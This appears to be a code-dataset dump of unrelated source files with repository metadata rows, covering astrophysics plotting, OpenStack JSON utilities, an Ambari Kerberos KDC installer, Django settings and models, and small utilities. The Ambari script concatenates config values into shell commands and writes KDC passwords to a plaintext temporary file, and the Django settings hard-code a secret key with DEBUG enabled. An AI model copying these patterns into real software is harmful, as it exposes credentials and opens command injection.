from uncertainties import ufloat, unumpy, umath
import pandas as pd
# Generate dazer object
dz = Dazer()
# Declare figure format
size_dict = {'figure.figsize': (14, 6), 'axes.labelsize': 20, 'legend.fontsize': 20, 'font.family': 'Times New Roman',
'mathtext.default': 'regular', 'xtick.labelsize': 20, 'ytick.labelsize': 20}
dz.FigConf(plotSize=size_dict)
# Declare data location
folder_data = '/home/vital/Dropbox/Astrophysics/Seminars/Cloudy School 2017/teporingos/Grid_data_vital/'
file_name_list_S = ['TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_S',
'TGrid_Mass200000.0_age5.48_zStar-2.1_zGas0.008.ele_S']
file_name_list_O = ['TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_O',
'TGrid_Mass200000.0_age5.48_zStar-2.1_zGas0.008.ele_O']
z_list = ['100000', '200000']
ions_list_S = ['S+', 'S+2', 'S+3']
ions_labels_S = [r'$S^{+}$', r'$S^{2+}$', r'$S^{3+}$']
ions_list_O = ['O+', 'O+2']
ions_labels_O = [r'$O^{+}$', r'$O^{2+}$']
labels_coords_S = [[(1.60e18, 0.98), (2.35e18, 0.98)],
[(1.0e18, 0.72), (1.77e18, 0.72)],
[(0.75e18, 0.000005), (2.0e18, 0.015)]]
labels_coords_O = [[(1.55e18, 0.5), (2.3e18, 0.5)],
[(1.03e18, 0.6), (1.8e18, 0.6)]]
# Generate the color map
dz.gen_colorList(0, 5)
# ions_colors_S = [dz.get_color(0), dz.get_color(1), dz.get_color(2)]
# ions_colors_O = [dz.get_color(3), dz.get_color(4)]
ions_colors_S = ['tab:orange', 'tab:red', 'tab:brown']
ions_colors_O = ['tab:blue', 'tab:green']
line_type = ['--', '-']
for i in range(len(file_name_list_S)):
file_name = file_name_list_S[i]
elemIon_df = pd.read_csv(folder_data + file_name, sep='\t')
for j in range(len(ions_list_S)):
ion = ions_list_S[j]
radious = elemIon_df['#depth'].values
ion_frac = elemIon_df[ion].values
label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i]))
dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_S[j], linestyle=line_type[i],
label=r'Cluster mass {}'.format(label), linewidth=2)
dz.plot_text(labels_coords_S[j][i][0] / 1e19, labels_coords_S[j][i][1], text=ions_labels_S[j],
color=ions_colors_S[j], fontsize=20, axis_plot=None)
file_name = file_name_list_O[i]
elemIon_df = pd.read_csv(folder_data + file_name, sep='\t')
for j in range(len(ions_list_O)):
ion = ions_list_O[j]
radious = elemIon_df['#depth'].values
ion_frac = elemIon_df[ion].values
label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i]))
dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_O[j], linestyle=line_type[i],
label=r'Cluster mass {}'.format(label))
dz.plot_text(labels_coords_O[j][i][0] / 1e19, labels_coords_O[j][i][1], text=ions_labels_O[j],
color=ions_colors_O[j], fontsize=20, axis_plot=None)
dz.FigWording(r'$R_{19}$ $(10^{19}cm)$', r'$X(A^{+i})$', '', ncols_leg=1)
leg = dz.Axis.get_legend()
leg.legendHandles[0].set_color('black')
leg.legendHandles[1].set_color('black')
# dz.display_fig()
dz.display_fig()
# dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/SulfurIonization_fraction_vs_cloudThickness')
# dz.savefig('/home/vital/Dropbox/Astrophysics/Seminars/Stasinska conference/SulfurIonization_fraction_vs_cloudThickness')
# #Load catalogue dataframe
# catalogue_dict = dz.import_catalogue()
# catalogue_df = dz.load_excel_DF('/home/vital/Dropbox/Astrophysics/Data/WHT_observations/WHT_Galaxies_properties.xlsx')
#
# #Define plot frame and colors
# size_dict = {'axes.labelsize':24, 'legend.fontsize':24, 'font.family':'Times New Roman', 'mathtext.default':'regular', 'xtick.labelsize':22, 'ytick.labelsize':22}
# dz.FigConf(plotSize = size_dict)
#
# dz.quick_indexing(catalogue_df)
# idcs = (pd.notnull(catalogue_df.OI_HI_emis2nd)) & (pd.notnull(catalogue_df.NI_HI_emis2nd)) & (pd.notnull(catalogue_df.HeII_HII_from_O_emis2nd)) & (catalogue_df.quick_index.notnull()) & (~catalogue_df.index.isin(['SHOC593']))
#
# #Prepare data
# O_values = catalogue_df.loc[idcs].OI_HI_emis2nd.values
# N_values = catalogue_df.loc[idcs].NI_HI_emis2nd.values
# HeII_HI = catalogue_df.loc[idcs].HeII_HII_from_O_emis2nd.values
# objects = catalogue_df.loc[idcs].quick_index.values
#
# N_O_ratio = N_values/O_values
#
# dz.data_plot(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), label = '', markerstyle='o', x_error=unumpy.std_devs(HeII_HI), y_error=unumpy.std_devs(N_O_ratio))
# dz.plot_text(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), text=objects, x_pad=1.005, y_pad=1.01)
#
# dz.FigWording(r'y', r'$N/O$', '')
# # dz.display_fig()
# dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/NO_to_y')
# from dazer_methods import Dazer
# from numpy import nanmean, nanstd, mean, nan as np_nan
# from uncertainties import ufloat, unumpy, umath
# import pandas as pd
#
# # Generate dazer object
# dz = Dazer()
#
# # Declare figure format
# size_dict = {'figure.figsize': (10, 10), 'axes.labelsize': 24, 'legend.fontsize': 14, 'font.family': 'Times New Roman',
# 'mathtext.default': 'regular', 'xtick.labelsize': 22, 'ytick.labelsize': 22}
# dz.FigConf(plotSize=size_dict)
#
# # Declare data location
# folder_data = '/home/vital/Dropbox/Astrophysics/Seminars/Cloudy School 2017/teporingos/Grid_data_vital/'
# file_name_list_S = [
# 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_S'] # , 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_S']
# file_name_list_O = [
# 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_O'] # , 'TGrid_Mass100000.0_age5.48_zStar-2.1_zGas0.008.ele_O']
# z_list = ['200000', '100000']
# ions_list_S = ['S+', 'S+2', 'S+3']
# ions_labels_S = [r'$S^{+}$', r'$S^{2+}$', r'$S^{3+}$']
# ions_list_O = ['O+', 'O+2']
# ions_labels_O = [r'$O^{+}$', r'$O^{2+}$']
# labels_coords_S = [[(1.65e18, 1.0),
# (2.4e18, 1.0)],
# [(1.0e18, 0.75),
# (1.77e18, 0.75)],
# [(1.2e18, 0.015),
# (2.0e18, 0.015)]]
# labels_coords_O = [[(1.55e18, 0.5),
# (2.3e18, 0.5)],
# [(1.03e18, 0.6),
# (1.8e18, 0.6)]]
# ions_colors_S = ['tab:orange', 'tab:red', 'tab:brown']
# ions_colors_O = ['tab:blue', 'tab:green']
#
# line_type = ['-', '--']
#
# for i in range(len(file_name_list_S)):
#
# file_name = file_name_list_S[i]
#
# elemIon_df = pd.read_csv(folder_data + file_name, sep='\t')
#
# for j in range(len(ions_list_S)):
# ion = ions_list_S[j]
# radious = elemIon_df['#depth'].values
# ion_frac = elemIon_df[ion].values
# label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i]))
# dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_S[j], linestyle=line_type[i],
# label=r'Cluster mass {}'.format(label), linewidth=3)
# dz.plot_text(labels_coords_S[j][i][0] / 1e19, labels_coords_S[j][i][1], text=ions_labels_S[j],
# color=ions_colors_S[j], fontsize=17, axis_plot=None)
#
# file_name = file_name_list_O[i]
#
# elemIon_df = pd.read_csv(folder_data + file_name, sep='\t')
#
# for j in range(len(ions_list_O)):
# ion = ions_list_O[j]
# radious = elemIon_df['#depth'].values
# ion_frac = elemIon_df[ion].values
# label = r'{0:1.1e} $M_\odot$'.format(float(z_list[i]))
# dz.data_plot(radious / 1e19, ion_frac, color=ions_colors_O[j], linestyle=line_type[i],
# label=r'Cluster mass {}'.format(label))
# dz.plot_text(labels_coords_O[j][i][0] / 1e19, labels_coords_O[j][i][1], text=ions_labels_O[j],
# color=ions_colors_O[j], fontsize=17, axis_plot=None)
#
# dz.FigWording(r'$R_{19}$ $(10^{19}cm)$', r'$X(A^{+i})$', '', ncols_leg=1)
#
# leg = dz.Axis.get_legend()
# leg.legendHandles[0].set_color('black')
# # leg.legendHandles[1].set_color('black')
#
# # dz.display_fig()
# # dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/SulfurIonization_fraction_vs_cloudThickness')
# dz.savefig('/home/vital/Dropbox/Astrophysics/Seminars/Stasinska conference/SulfurIonization_fraction_vs_cloudThickness')
#
# # #Load catalogue dataframe
# # catalogue_dict = dz.import_catalogue()
# # catalogue_df = dz.load_excel_DF('/home/vital/Dropbox/Astrophysics/Data/WHT_observations/WHT_Galaxies_properties.xlsx')
# #
# # #Define plot frame and colors
# # size_dict = {'axes.labelsize':24, 'legend.fontsize':24, 'font.family':'Times New Roman', 'mathtext.default':'regular', 'xtick.labelsize':22, 'ytick.labelsize':22}
# # dz.FigConf(plotSize = size_dict)
# #
# # dz.quick_indexing(catalogue_df)
# # idcs = (pd.notnull(catalogue_df.OI_HI_emis2nd)) & (pd.notnull(catalogue_df.NI_HI_emis2nd)) & (pd.notnull(catalogue_df.HeII_HII_from_O_emis2nd)) & (catalogue_df.quick_index.notnull()) & (~catalogue_df.index.isin(['SHOC593']))
# #
# # #Prepare data
# # O_values = catalogue_df.loc[idcs].OI_HI_emis2nd.values
# # N_values = catalogue_df.loc[idcs].NI_HI_emis2nd.values
# # HeII_HI = catalogue_df.loc[idcs].HeII_HII_from_O_emis2nd.values
# # objects = catalogue_df.loc[idcs].quick_index.values
# #
# # N_O_ratio = N_values/O_values
# #
# # dz.data_plot(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), label = '', markerstyle='o', x_error=unumpy.std_devs(HeII_HI), y_error=unumpy.std_devs(N_O_ratio))
# # dz.plot_text(unumpy.nominal_values(HeII_HI), unumpy.nominal_values(N_O_ratio), text=objects, x_pad=1.005, y_pad=1.01)
# #
# # dz.FigWording(r'y', r'$N/O$', '')
# # # dz.display_fig()
# # dz.savefig('/home/vital/Dropbox/Astrophysics/Papers/Yp_AlternativeMethods/images/NO_to_y')
|
[
"[email protected]"
] | |
ec2e2f1225cf3c27c122d9403076f857e991253f
|
1b3613f17af551ae1023be03a78619fbf622a619
|
/vmthunder/openstack/common/jsonutils.py
|
662c79aae2e725e44c88fa37d4c622931c8ae778
|
[
"Apache-2.0"
] |
permissive
|
licyh/VMThunder
|
c2e9e45b1cb7263e6b23a631d2a16494265ba758
|
5daa10d1a78c52df2a5233c8f54823ac17cc7b06
|
refs/heads/master
| 2021-01-22T12:17:11.478468 | 2014-10-16T03:53:45 | 2014-10-16T03:53:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,489 |
py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
'''
JSON related utilities.
This module provides a few things:
1) A handy function for getting an object down to something that can be
JSON serialized. See to_primitive().
2) Wrappers around loads() and dumps(). The dumps() wrapper will
automatically use to_primitive() for you if needed.
3) This sets up anyjson to use the loads() and dumps() wrappers if anyjson
is available.
'''
import datetime
import functools
import inspect
import itertools
import json
import six
import six.moves.xmlrpc_client as xmlrpclib
from vmthunder.openstack.common import gettextutils
from vmthunder.openstack.common import importutils
from vmthunder.openstack.common import timeutils
netaddr = importutils.try_import("netaddr")
_nasty_type_tests = [inspect.ismodule, inspect.isclass, inspect.ismethod,
inspect.isfunction, inspect.isgeneratorfunction,
inspect.isgenerator, inspect.istraceback, inspect.isframe,
inspect.iscode, inspect.isbuiltin, inspect.isroutine,
inspect.isabstract]
_simple_types = (six.string_types + six.integer_types
+ (type(None), bool, float))
def to_primitive(value, convert_instances=False, convert_datetime=True,
level=0, max_depth=3):
"""Convert a complex object into primitives.
Handy for JSON serialization. We can optionally handle instances,
but since this is a recursive function, we could have cyclical
data structures.
To handle cyclical data structures we could track the actual objects
visited in a set, but not all objects are hashable. Instead we just
track the depth of the object inspections and don't go too deep.
Therefore, convert_instances=True is lossy ... be aware.
"""
# handle obvious types first - order of basic types determined by running
# full tests on nova project, resulting in the following counts:
# 572754 <type 'NoneType'>
# 460353 <type 'int'>
# 379632 <type 'unicode'>
# 274610 <type 'str'>
# 199918 <type 'dict'>
# 114200 <type 'datetime.datetime'>
# 51817 <type 'bool'>
# 26164 <type 'list'>
# 6491 <type 'float'>
# 283 <type 'tuple'>
# 19 <type 'long'>
if isinstance(value, _simple_types):
return value
if isinstance(value, datetime.datetime):
if convert_datetime:
return timeutils.strtime(value)
else:
return value
# value of itertools.count doesn't get caught by nasty_type_tests
# and results in infinite loop when list(value) is called.
if type(value) == itertools.count:
return six.text_type(value)
# FIXME(vish): Workaround for LP bug 852095. Without this workaround,
# tests that raise an exception in a mocked method that
# has a @wrap_exception with a notifier will fail. If
# we up the dependency to 0.5.4 (when it is released) we
# can remove this workaround.
if getattr(value, '__module__', None) == 'mox':
return 'mock'
if level > max_depth:
return '?'
# The try block may not be necessary after the class check above,
# but just in case ...
try:
recursive = functools.partial(to_primitive,
convert_instances=convert_instances,
convert_datetime=convert_datetime,
level=level,
max_depth=max_depth)
if isinstance(value, dict):
return dict((k, recursive(v)) for k, v in six.iteritems(value))
elif isinstance(value, (list, tuple)):
return [recursive(lv) for lv in value]
# It's not clear why xmlrpclib created their own DateTime type, but
# for our purposes, make it a datetime type which is explicitly
# handled
if isinstance(value, xmlrpclib.DateTime):
value = datetime.datetime(*tuple(value.timetuple())[:6])
if convert_datetime and isinstance(value, datetime.datetime):
return timeutils.strtime(value)
elif isinstance(value, gettextutils.Message):
return value.data
elif hasattr(value, 'iteritems'):
return recursive(dict(value.iteritems()), level=level + 1)
elif hasattr(value, '__iter__'):
return recursive(list(value))
elif convert_instances and hasattr(value, '__dict__'):
# Likely an instance of something. Watch for cycles.
# Ignore class member vars.
return recursive(value.__dict__, level=level + 1)
elif netaddr and isinstance(value, netaddr.IPAddress):
return six.text_type(value)
else:
if any(test(value) for test in _nasty_type_tests):
return six.text_type(value)
return value
except TypeError:
# Class objects are tricky since they may define something like
# __iter__ defined but it isn't callable as list().
return six.text_type(value)
def dumps(value, default=to_primitive, **kwargs):
return json.dumps(value, default=default, **kwargs)
def loads(s):
return json.loads(s)
def load(s):
return json.load(s)
try:
import anyjson
except ImportError:
pass
else:
anyjson._modules.append((__name__, 'dumps', TypeError,
'loads', ValueError, 'load'))
anyjson.force_implementation(__name__)
|
[
"[email protected]"
] | |
f8de0cc0211fe9b16c552b419529d6119fef0e83
|
89a00777e75a1e7ad0394fccbd38eb74438e483b
|
/package/scripts/master.py
|
87441b4de46dceffd484fe506614d5cb70938609
|
[] |
no_license
|
damienclaveau/kdc-stack
|
9258aac2324fcd03a863964722e04207ca747255
|
a7b247ef5e0767c981e2772b260a2c46aaa3864c
|
refs/heads/master
| 2021-01-21T00:43:38.052940 | 2015-03-17T05:12:42 | 2015-03-17T05:12:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,990 |
py
|
import sys, os, pwd, signal, time
from resource_management import *
from subprocess import call
class Master(Script):
def install(self, env):
# Install packages listed in metainfo.xml
self.install_packages(env)
self.configure(env)
import params
Execute('sed -i "s/EXAMPLE.COM/'+params.kdc_realm+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf')
Execute('sed -i "s/kerberos.example.com/'+params.kdc_host+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf')
Execute('sed -i "s/example.com/'+params.kdc_domain+'/g" /var/lib/ambari-server/resources/scripts/krb5.conf')
Execute('/bin/cp -f /var/lib/ambari-server/resources/scripts/krb5.conf /etc')
Execute('echo "'+params.kdb_password+'" > passwd.txt')
Execute('echo "'+params.kdb_password+'" >> passwd.txt')
Execute('echo >> passwd.txt')
Execute('kdb5_util create -s < passwd.txt')
Execute('rm passwd.txt')
Execute('/etc/rc.d/init.d/krb5kdc start')
Execute('/etc/rc.d/init.d/kadmin start')
Execute('chkconfig krb5kdc on')
Execute('chkconfig kadmin on')
Execute('echo "'+params.kdc_adminpassword+'" > passwd.txt')
Execute('echo "'+params.kdc_adminpassword+'" >> passwd.txt')
Execute('echo >> passwd.txt')
Execute('kadmin.local -q "addprinc '+params.kdc_admin+'" < passwd.txt')
Execute('rm passwd.txt')
Execute('echo "*/[email protected] *" > /var/kerberos/krb5kdc/kadm5.acl')
#Execute('/etc/rc.d/init.d/krb5kdc restart')
#Execute('/etc/rc.d/init.d/kadmin restart')
def configure(self, env):
import params
env.set_params(params)
def stop(self, env):
import params
Execute('service krb5kdc stop')
Execute('service kadmin stop')
def start(self, env):
import params
Execute('service krb5kdc start')
Execute('service kadmin start')
def status(self, env):
import params
Execute('service krb5kdc status')
if __name__ == "__main__":
Master().execute()
|
[
"[email protected]"
] | |
c35de16dd47821fb8bd0c74d9ed293dc5ee70956
|
34ef83114e02b173bd2d55eb53ad399e738a8e3c
|
/django/code_test/teka/teka/settings.py
|
ca05f4f1f4426561e47f91918dae0a82be1e722d
|
[] |
no_license
|
vavilon/Python3
|
e976a18eb301e4953696d1e3f4730ed890da015a
|
8c79729747ce51d60ad685e6a2e58292954ed7eb
|
refs/heads/master
| 2023-01-09T13:44:37.408601 | 2018-01-25T22:41:14 | 2018-01-25T22:41:14 | 100,892,055 | 0 | 1 | null | 2022-12-26T20:29:27 | 2017-08-20T22:23:06 |
Python
|
UTF-8
|
Python
| false | false | 3,232 |
py
|
"""
Django settings for teka project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7&(=23s0&zbaks8=)r=a=5xb^mz61l1&m2&=to8_j*2h^c0ld9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'apps',
'bootstrap3',
'bootstrap4',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'teka.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'teka.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static")),
|
[
"[email protected]"
] | |
71bb3fad91cbbcdcb44e3c33d83d4877eb1fb75d
|
4324bfea818c8fa11f991f9eac24c6251db35dd5
|
/keycoded.py
|
51fb02586af64cac9a36340c024ddb635dc7c156
|
[] |
no_license
|
gjedeer/htc-vision-postmarketos
|
d368c13fd843c171d51e47cef786fa5f807fb03a
|
17840dd6fd382667af6846851e4d6710497dc759
|
refs/heads/master
| 2020-05-18T21:19:36.159309 | 2019-05-02T22:35:48 | 2019-05-02T22:35:48 | 184,657,935 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,943 |
py
|
#!/usr/bin/python
import struct
import time
import sys
import os
infile_path = "/dev/input/event" + (sys.argv[1] if len(sys.argv) > 1 else "3")
#long int, long int, unsigned short, unsigned short, unsigned int
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
framebuffer = int(os.getenv('FRAMEBUFFER', 0))
#open file in binary mode
in_file = open(infile_path, "rb")
buf = ""
POWER_BUTTON = 116
KEYUP = 0
KEYDOWN = 1
FB_BLANK_PATH = '/sys/class/graphics/fb%d/blank' % framebuffer
fb_blank = 0
power_key_down = None
def is_blank():
return fb_blank
def toggle_blank():
global fb_blank
blank = is_blank()
print "Blank: %d" % fb_blank
with open(FB_BLANK_PATH, 'w') as f:
f.write("%d" % int(not blank))
fb_blank = int(not blank)
print "Blank: %d" % fb_blank
while True:
buf += in_file.read(1)
if len(buf) >= EVENT_SIZE:
event = buf[:EVENT_SIZE]
buf = buf[EVENT_SIZE:]
(tv_sec, tv_usec, type, code, value) = struct.unpack(FORMAT, event)
if type != 0 or code != 0 or value != 0:
print("Event type %u, code %u, value %u at %d.%d" % \
(type, code, value, tv_sec, tv_usec))
if type == 1:
if code == POWER_BUTTON:
if value == KEYUP:
power_key_up = tv_sec + 0.000001 * tv_usec
if power_key_down and power_key_up - power_key_down > 5:
print "SHUTDOWN"
os.system("poweroff")
else:
toggle_blank()
power_key_down = None
elif value == KEYDOWN:
power_key_down = tv_sec + 0.000001 * tv_usec
else:
# Events with code, type and value == 0 are "separator" events
print("===========================================")
in_file.close()
|
[
"[email protected]"
] | |
33297c80981be4147b2f9bbef3eef38f163010b9
|
d509fb7b7a0a35bf752f977417d2b3119a00b084
|
/wordsiv/punctuation.py
|
63dcdad8de6602be16fda7c1bb7c737d55fbb405
|
[
"MIT",
"LicenseRef-scancode-public-domain"
] |
permissive
|
tallpauley/wordsiv
|
c0904fc9fa8a6032a06a9cfb3b3cadc6373ca2da
|
935e6a08cd39134b7408b67d6ff721830d03a5ec
|
refs/heads/main
| 2023-05-10T04:32:39.135705 | 2021-05-20T21:26:22 | 2021-05-20T21:26:22 | 357,676,771 | 24 | 1 |
MIT
| 2021-05-20T21:26:23 | 2021-04-13T20:12:55 |
Python
|
UTF-8
|
Python
| false | false | 2,341 |
py
|
def default_punc_func(words, rand, start, end, inner, wrap):
# Sort of derived from wikipedia, but increased freq of lesser used punctuation
# https://en.wikipedia.org/wiki/English_punctuation#Frequency
# place "inner" punctuation (like comma, hyphen, etc)
insert_index = rand.randrange(len(words) - 1)
words[insert_index] = words[insert_index] + inner
# place surrounding punctuation
return wrap[0] + start + " ".join(words) + end + wrap[1]
def random_available(option_weight, glyphs_string, rand):
options, weights = zip(
*{
cs: prob
for cs, prob in option_weight.items()
if all(c in glyphs_string for c in cs)
}.items()
)
return rand.choices(options, weights=weights, k=1)[0]
def punctuate(words, glyphs_string, rand, language, punc_func=None):
"""Punctuate a list of words and join into a sentence using punc_func
Example w/ no punc available:
>>> import random
>>> words = ["hamburger", "fonts", "vise", "gurb", "ram"]
>>> glyphs_string = 'HAMBURGERFONTSIVhamburgerfontsiv'
>>> rand = random.Random(5)
>>> punctuate(words, glyphs_string, rand, "en", default_punc_func)
'hamburger fonts vise gurb ram'
Example w/ punc available:
>>> glyphs_string = 'HAMBURGERFONTSIVhamburgerfontsiv.,'
>>> punctuate(words, glyphs_string, rand, "en", default_punc_func)
'hamburger fonts vise gurb ram.'
"""
if not punc_func:
punc_func = default_punc_func
start = random_available(
default_punctuation[language]["start"], glyphs_string, rand
)
end = random_available(default_punctuation[language]["end"], glyphs_string, rand)
inner = random_available(
default_punctuation[language]["inner"], glyphs_string, rand
)
wrap = random_available(default_punctuation[language]["wrap"], glyphs_string, rand)
return punc_func(words, rand, start, end, inner, wrap)
default_punctuation = {
"en": {
"start": {"": 100},
# make no ending punctuation extremely low probability so
# it only happens when period is not available
"end": {"": 0.00001, ".": 100, "?": 40, "!": 20},
"inner": {"": 100, ",": 60, "—": 40, ":": 30, ";": 20},
"wrap": {("", ""): 100, ("“", "”"): 9, ("‘", "’"): 6},
}
}
|
[
"[email protected]"
] | |
8e7f5dcc339c5006d5ba09592c2e38aaa9eda380
|
4a8318fb3775476b3cb849ef32426ced6bbb86e5
|
/py/p030.py
|
8a50ec6b350ba080f2b666f7e54dceb587c24fcd
|
[] |
no_license
|
zellyn/project-euler
|
422de8387320ebb9b7a978e348dd7e12e1048352
|
087061f007350ac2c210c5ef19f1ccc3d89dea35
|
refs/heads/master
| 2021-01-21T05:00:15.903675 | 2020-01-17T14:21:44 | 2020-01-17T14:21:44 | 154,268 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 459 |
py
|
#!/usr/bin/env python
# Project Euler
# Problem 30
#
# Find the sum of all the numbers that can be written as the sum of
# fifth powers of their digits.
def fifth_power_eq(n):
sum = 0
i = n
while i:
sum += (i % 10) ** 5
i //= 10
return sum == n
def p030():
nums = []
for n in xrange(2, 999999):
if fifth_power_eq(n):
nums.append(n)
return sum(nums)
if __name__=='__main__':
print p030()
|
[
"[email protected]"
] | |
44a0a7737d19c1e6e47ddf5525d0d632188aabd2
|
10f397d1fe8c68dc5af033e0b88cb99be56bc4f2
|
/Statistics/models.py
|
28a3d7a4f4138e1e4c55db79c7ee134721781ded
|
[] |
no_license
|
wsqy/AccountRandmomAmount
|
db3905bd425c074935c256aab62f437fe7cb0ffc
|
b69bc1269a666c48fe954ac423a25d111e01176b
|
refs/heads/master
| 2023-06-29T12:49:35.947729 | 2020-06-30T03:27:05 | 2020-06-30T03:27:05 | 271,683,993 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,592 |
py
|
from django.db import models
# from django.conf import settings
from django.utils import timezone
from Account.models import Buyer, Seller, Company
class DayBuyer(models.Model):
"""
买方日交易额总量表
"""
date = models.DateField(verbose_name='任务日期', default=timezone.now)
buyer = models.ForeignKey(Buyer, on_delete=models.PROTECT, verbose_name='买方')
amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0)
class Meta:
verbose_name = '买方日交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.buyer, self.date, self.amount_total)
class DaySeller(models.Model):
"""
卖方日交易额总量表
"""
date = models.DateField(verbose_name='任务日期', default=timezone.now)
seller = models.ForeignKey(Seller, on_delete=models.PROTECT, verbose_name='卖方')
amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0)
class Meta:
verbose_name = '卖方日交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.seller, self.date, self.amount_total)
class DayCompany(models.Model):
"""
集团子公司日交易额总量表
"""
date = models.DateField(verbose_name='任务日期', default=timezone.now)
company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name='集团子公司')
amount_total = models.IntegerField(verbose_name='日总交易金额(万元)', default=0)
class Meta:
verbose_name = '集团子公司日交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.company, self.date, self.amount_total)
class MouthBuyer(models.Model):
"""
买方月交易额总量表
"""
date = models.CharField(max_length=8, verbose_name='月份')
buyer = models.ForeignKey(Buyer, on_delete=models.PROTECT, verbose_name='买方')
amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0)
class Meta:
verbose_name = '买方月交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.buyer, self.date, self.amount_total)
class MouthSeller(models.Model):
"""
卖方月交易额总量表
"""
date = models.CharField(max_length=8, verbose_name='月份')
seller = models.ForeignKey(Seller, on_delete=models.PROTECT, verbose_name='卖方')
amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0)
class Meta:
verbose_name = '卖方月交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.seller, self.date, self.amount_total)
class MouthCompany(models.Model):
"""
集团子公司月交易额总量表
"""
date = models.CharField(max_length=8, verbose_name='月份')
company = models.ForeignKey(Company, on_delete=models.PROTECT, verbose_name='集团子公司')
amount_total = models.IntegerField(verbose_name='月总交易金额(万元)', default=0)
class Meta:
verbose_name = '集团子公司月交易额总量'
verbose_name_plural = verbose_name
def __str__(self):
return '{}于{}总交易额{}万元'.format(self.company, self.date, self.amount_total)
|
[
"[email protected]"
] | |
e625e4dba04302b5a4595e8647919e5ef1a21495
|
